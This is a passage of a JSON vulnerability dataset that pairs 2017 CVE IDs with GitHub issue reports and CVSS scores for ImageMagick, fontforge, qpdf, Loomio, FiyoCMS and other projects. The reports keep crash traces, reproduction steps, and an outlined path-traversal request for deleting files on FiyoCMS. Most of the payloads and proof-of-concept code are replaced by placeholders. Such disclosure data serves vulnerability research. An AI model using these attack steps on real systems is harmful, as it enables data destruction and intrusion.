        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/524",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/524",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-24T09:13:22Z",
        "description": "memory exhaustion in APITAG in ept.c. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify EPT file , imagemagick will allocate memory to store the data. Here is the critical code: ERRORTAG APITAG and APITAG can be controlled as follow: APITAG There is a security checking in the function APITAG but it is not used in this function, so IM can not control the memory usage Here is my FILETAG to limit memory usage APITAG And here is the monitor of real memory usage from IM starting to IM ending NUMBERTAG MB limit can be bypassed: CODETAG testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11531",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/566",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/566",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-16T18:36:27Z",
        "description": "Memory Leak in APITAG coders/histogram.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory APITAG APITAG Leak Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11532",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/563",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/563",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-16T15:36:17Z",
        "description": "Memory Leak in APITAG Memory Leak Sample Link : URLTAG Trigger Command : ./magick convert APITAG output.mpc Leak Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11533",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/562",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/562",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-16T13:53:44Z",
        "description": "heap overflow in APITAG Crash Link : FILETAG Trigger Command : ./magick convert heap buffer overflow READ APITAG output.uil Crash Information : PATHTAG ./magick convert PATHTAG output.uil APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG d NUMBERTAG cbdc at pc NUMBERTAG f NUMBERTAG c NUMBERTAG d bp NUMBERTAG fff1b NUMBERTAG b0 sp NUMBERTAG fff1b NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG d NUMBERTAG cbdc thread T NUMBERTAG f NUMBERTAG c NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a9a3eb in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG d NUMBERTAG cbdc is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG ee NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG eb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG eb9d5 in APITAG APITAG NUMBERTAG f NUMBERTAG c2f0 in APITAG APITAG NUMBERTAG f NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a9a3eb in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG fa fa fa fa NUMBERTAG c5a7fffb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb9a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb9b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb9c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11534",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/564",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/564",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-16T18:31:52Z",
        "description": "Memory Leak in APITAG coders/wmf.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory leak_output_art_lite_font_map output.art Leak Detail : PATHTAG ./magick convert APITAG Leak NUMBERTAG output_art NUMBERTAG output.art ERROR: player.c NUMBERTAG libwmf: wmf with bizarre record size; bailing... ERROR: player.c NUMBERTAG please send it to us at FILETAG maximum record size NUMBERTAG record size NUMBERTAG convert: APITAG ERRORTAG APITAG @ PATHTAG convert: APITAG ERRORTAG APITAG @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG d NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d5 in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG b in APITAG APITAG NUMBERTAG f NUMBERTAG bbc NUMBERTAG dd in lite_font_map APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG d NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG b9 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG d NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c8 ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11535",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/561",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/561",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-16T13:52:32Z",
        "description": "heap overflow in APITAG Crash Link : FILETAG Trigger Command : ./magick convert heap buffer overflow READ APITAG output.ps Crash Information : PATHTAG ./magick convert PATHTAG output.ps APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG a NUMBERTAG fedcc at pc NUMBERTAG f NUMBERTAG aec0f9c2 bp NUMBERTAG ffcb NUMBERTAG d5a NUMBERTAG sp NUMBERTAG ffcb NUMBERTAG d5a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG a NUMBERTAG fedcc thread T NUMBERTAG f NUMBERTAG aec0f9c1 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG aec NUMBERTAG ff8 in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG adf9c3eb in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG fedcc is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG af3e NUMBERTAG in __interceptor_posix_memalign ( PATHTAG NUMBERTAG f NUMBERTAG ae8ed8de in APITAG APITAG NUMBERTAG f NUMBERTAG ae6e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ae6dd0d1 in APITAG APITAG NUMBERTAG f NUMBERTAG ae6ec1f0 in APITAG APITAG NUMBERTAG f NUMBERTAG ae8b NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG aec NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG adf NUMBERTAG ad in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow APITAG APITAG APITAG Shadow bytes around the buggy address NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG da NUMBERTAG fe NUMBERTAG db NUMBERTAG fa[fa]fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11536",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/567",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/567",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-16T18:37:29Z",
        "description": "Memory Leak in APITAG coders/jp2.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory APITAG output.jp2 Leak Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11537",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/560",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/560",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-16T13:49:58Z",
        "description": "Crash in APITAG write palm format image. Crash Link : FILETAG Trigger Command : ./magick convert FPE APITAG APITAG Crash Detail : PATHTAG ./magick convert PATHTAG APITAG Aborted (core dumped)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11538",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/569",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/569",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-16T18:42:01Z",
        "description": "Memory Leak in APITAG coders/png.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory APITAG FILETAG Leak Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11539",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/582",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/582",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-18T04:52:17Z",
        "description": "Memory Leak in APITAG coders/png.c. Crash Link : URLTAG Trigger Command : ./magick convert memory APITAG output.art Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11540",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/581",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/581",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-18T04:41:54Z",
        "description": "Heap Overflow in APITAG APITAG accessor.h. Crash Link : URLTAG Trigger Command : ./magick convert heap APITAG APITAG Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11554",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2445",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2445",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2017-07-18T13:21:02Z",
        "description": "There is a stack overflow in sassc of the libsass library. This was reported here: CVETAG In this Bugzilla ticket you will find all the information and the code to reproduce the error.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11568",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3089",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3089",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2017-06-14T13:41:09Z",
        "description": "heap buffer overflow in APITAG (psread.c). ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11569",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3093",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3093",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2017-06-14T13:48:35Z",
        "description": "heap buffer overflow in readttfcopyrights (parsettf.c). ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11570",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3097",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3097",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2017-06-14T13:54:25Z",
        "description": "global buffer overflow in umodenc (parsettf.c). ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11571",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3087",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3087",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2017-06-14T13:35:58Z",
        "description": "stack buffer overflow in addnibble (parsettf.c). ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11572",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3092",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3092",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2017-06-14T13:47:01Z",
        "description": "heap buffer overflow in readcfftopdicts (parsettf.c). ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11573",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3098",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3098",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2017-06-14T13:55:38Z",
        "description": "global buffer overflow in APITAG (parsettf.c). ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11574",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3090",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3090",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2017-06-14T13:43:23Z",
        "description": "heap buffer overflow in readcffset (parsettf.c). ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11575",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3096",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3096",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2017-06-14T13:52:52Z",
        "description": "global buffer overflow in strnmatch (char.c). ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11576",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3091",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3091",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2017-06-14T13:45:05Z",
        "description": "negative size param in readcfftopdict (parsettf.c). ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11577",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3088",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3088",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2017-06-14T13:38:49Z",
        "description": "global buffer overflow in getsid (parsettf.c). ERRORTAG Testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11593",
        "Issue_Url_old": "https://github.com/volca/markdown-preview/issues/60",
        "Issue_Url_new": "https://github.com/volca/markdown-preview/issues/60",
        "Repo_new": "volca/markdown-preview",
        "Issue_Created_At": "2017-03-04T23:23:26Z",
        "description": "Sanitize content to avoid XSS. Markdown Preview makes APITAG vulnerable to XSS attacks on files that are not designed to be interpreted by web applications. How to reproduce NUMBERTAG An malicious user creates a txt file (or another format supported by Markdown Preview) with the following content: APITAG NUMBERTAG He uploads it on a remove server using a web application NUMBERTAG If the web application allows the opening of txt files in the browser, Markdown Preview is a vector for XSS attacks, because the JS payload will be executed This behavior makes all users of Markdown Preview vulnerable to XSS attacks in a lot of web sites, because these websites are not designed to escape or force the download of txt files. How to fix Markdown Preview should sanitize the content in order to avoid XSS.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11594",
        "Issue_Url_old": "https://github.com/loomio/loomio/issues/4220",
        "Issue_Url_new": "https://github.com/loomio/loomio/issues/4220",
        "Repo_new": "loomio/loomio",
        "Issue_Created_At": "2017-07-21T19:36:04Z",
        "description": "FILETAG > Hello, > > I just found an XSS vulnerability in Loomio. > > How to reproduce > > A malicious user creates an new thread > In the description, (s)he enters: APITAG > The targeted user visits the thread and clicks on the malicious link > The JS payload is executed > > How to fix > > \"href\" content should be sanitized > > > I found this vulnerability because I'm currently and voluntarily > searching for XSS vulnerabilities in the services that we offer or use > at the French non profit association Framasoft. > > I remain available for any additional comments or questions. > > Best, > Martin Thanks to the Loomio developers for the fix.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-11610",
        "Issue_Url_old": "https://github.com/Supervisor/supervisor/issues/964",
        "Issue_Url_new": "https://github.com/supervisor/supervisor/issues/964",
        "Repo_new": "supervisor/supervisor",
        "Issue_Created_At": "2017-07-19T14:08:20Z",
        "description": "RCE vulnerability report. Hi, I would like to report Authenticated RCE vulnerability found in supervisord latest build. Please contact me at maors APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11624",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/117",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/117",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2017-06-04T08:22:45Z",
        "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11625",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/120",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/120",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2017-06-04T08:24:58Z",
        "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11626",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/119",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/119",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2017-06-04T08:24:29Z",
        "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11627",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/118",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/118",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2017-06-04T08:23:50Z",
        "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11630",
        "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/6",
        "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/6",
        "Repo_new": "fiyocms/fiyocms",
        "Issue_Created_At": "2017-07-20T15:38:47Z",
        "description": "Backuper.php $ type $ file variable have the vulnerability to delete any files. Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your work Fiyo CMS version NUMBERTAG has a vulnerability to remove any file. There is no need to login in when exploiting this vulnerability The code does not correct the $_POST FILETAG Vulnerability Verification (this will remove FILETAG under Web root) Url: FILETAG POST: type = database & file = .. \\ FILETAG Referrer: FILETAG Detailed request packet POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Referer: FILETAG Cookie: APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG FILETAG Discoverer: Neusoft of Rai NUMBERTAG over",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11631",
        "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/7",
        "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/7",
        "Repo_new": "fiyocms/fiyocms",
        "Issue_Created_At": "2017-07-21T06:10:33Z",
        "description": "PATHTAG $ _GET FILETAG APITAG APITAG http:// PATHTAG is the installation path of the site program APITAG Vulnerability Verification\u2460 APITAG a SQL injection attack packet that causes a response delay) APITAG URLTAG Referrer: FILETAG APITAG Detailed http request packet CODETAG The response was delayed by NUMBERTAG seconds FILETAG APITAG APITAG Vulnerability Verification\u2461 APITAG the python script for SQL injection attacks and get the current database user name) Python poc code CODETAG FILETAG Discoverer: Neusoft of Rai4over",
